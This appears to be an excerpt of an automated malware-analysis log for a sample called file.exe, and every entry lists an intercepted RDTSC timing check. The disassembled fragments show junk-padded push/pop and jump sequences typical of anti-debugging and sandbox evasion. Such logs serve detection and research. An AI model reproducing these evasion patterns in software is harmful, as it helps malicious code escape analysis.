                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9924B4 second address: 9924CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB8B0B4ABh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9924CA second address: 9924E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C654h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9924E2 second address: 9924EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992763 second address: 992767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992767 second address: 99277A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 je 00007F8FB8B0B4B2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9929D5 second address: 992A21 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FB915C646h 0x00000008 jmp 00007F8FB915C655h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007F8FB915C648h 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a jnc 00007F8FB915C646h 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8FB915C657h 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992B51 second address: 992B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8FB8B0B4A6h 0x0000000a pop edx 0x0000000b jmp 00007F8FB8B0B4B7h 0x00000010 pushad 0x00000011 jmp 00007F8FB8B0B4B0h 0x00000016 push eax 0x00000017 pop eax 0x00000018 js 00007F8FB8B0B4A6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992B8E second address: 992B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992CC7 second address: 992CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jp 00007F8FB8B0B4A6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F8FB8B0B4A6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992CDF second address: 992CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992FEA second address: 99300A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8FB8B0B4B6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99300A second address: 993037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C657h 0x00000009 jmp 00007F8FB915C652h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993037 second address: 993042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993042 second address: 993048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 991F6B second address: 991F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99686B second address: 996874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996874 second address: 99689C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F8FB8B0B4A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8FB8B0B4B9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99689C second address: 9968B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F8FB915C646h 0x0000000e jc 00007F8FB915C646h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9968B0 second address: 9968B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999284 second address: 9992A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Eh 0x00000007 jmp 00007F8FB915C64Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9992A3 second address: 9992A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99942A second address: 99945D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8FB915C652h 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jl 00007F8FB915C646h 0x00000014 popad 0x00000015 popad 0x00000016 jnl 00007F8FB915C65Ah 0x0000001c je 00007F8FB915C64Eh 0x00000022 push esi 0x00000023 pop esi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2A3B second address: 9A2A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2A43 second address: 9A2A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2A4B second address: 9A2A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2CD9 second address: 9A2CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2CDD second address: 9A2CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2CE3 second address: 9A2CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2CEC second address: 9A2D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F8FB8B0B4B2h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2D0D second address: 9A2D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5E8D second address: 9A5EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8FB8B0B4ACh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EA5 second address: 9A5EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EA9 second address: 9A5EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8FB8B0B4B7h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8FB8B0B4B0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8DC second address: 90F915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C656h 0x00000007 jmp 00007F8FB915C657h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F8FB915C648h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F915 second address: 90F91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8B1B second address: 9A8B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0F7 second address: 9AC0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0FD second address: 9AC103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC3AC second address: 9AC3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F8FB8B0B4A6h 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F8FB8B0B4B8h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC3D5 second address: 9AC3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F8FB915C64Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC7CD second address: 9AC7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F8FB8B0B4A6h 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F8FB8B0B4A6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC7E8 second address: 9AC806 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8FB915C646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jp 00007F8FB915C64Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5129 second address: 9B514E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F8FB8B0B4A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B514E second address: 9B5152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5152 second address: 9B515E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B515E second address: 9B5162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3F8B second address: 9B3F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B426B second address: 9B4273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B456E second address: 9B4584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F8FB8B0B4B0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4584 second address: 9B4588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9A27 second address: 9B9A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD7E8 second address: 9BD818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F8FB915C654h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F8FB915C64Dh 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD818 second address: 9BD822 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD822 second address: 9BD83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C658h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD83E second address: 9BD842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCD4E second address: 9BCD5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F8FB915C646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD516 second address: 9BD536 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FB8B0B4B4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9089AC second address: 9089B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9089B2 second address: 9089B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4596 second address: 9C459C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C489B second address: 9C48A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C48A1 second address: 9C48A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F4E second address: 9C4F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F55 second address: 9C4F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C64Ch 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F67 second address: 9C4F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F6B second address: 9C4F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8FB915C646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C4F7B second address: 9C4F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C621F second address: 9C6225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6225 second address: 9C6249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F8FB8B0B4AEh 0x0000000e jmp 00007F8FB8B0B4AEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3F70 second address: 9C3F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3F74 second address: 9C3F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3F78 second address: 9C3F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8880 second address: 9C8886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8886 second address: 9C8896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a ja 00007F8FB915C646h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD989 second address: 9CD98E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD98E second address: 9CD9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C655h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD9A9 second address: 9CD9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD9AF second address: 9CD9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8FB915C64Dh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB35 second address: 9CDB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB39 second address: 9CDB3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB3D second address: 9CDB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F8FB8B0B4A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB4D second address: 9CDB5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F8FB915C646h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDB5F second address: 9CDB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF40C second address: 9CF425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C64Ch 0x00000009 popad 0x0000000a jng 00007F8FB915C652h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1750 second address: 9D1756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1756 second address: 9D175A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D175A second address: 9D175F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D175F second address: 9D176C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D176C second address: 9D1770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1770 second address: 9D1774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF9EE second address: 9DF9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB39 second address: 9DFB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB3E second address: 9DFB49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F8FB8B0B4A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB49 second address: 9DFB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB55 second address: 9DFB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB59 second address: 9DFB6B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB915C646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F8FB915C646h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFB6B second address: 9DFB75 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FB8B0B4A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1FEA second address: 9E1FF4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8FB915C64Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1FF4 second address: 9E2005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8FB8B0B4C0h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
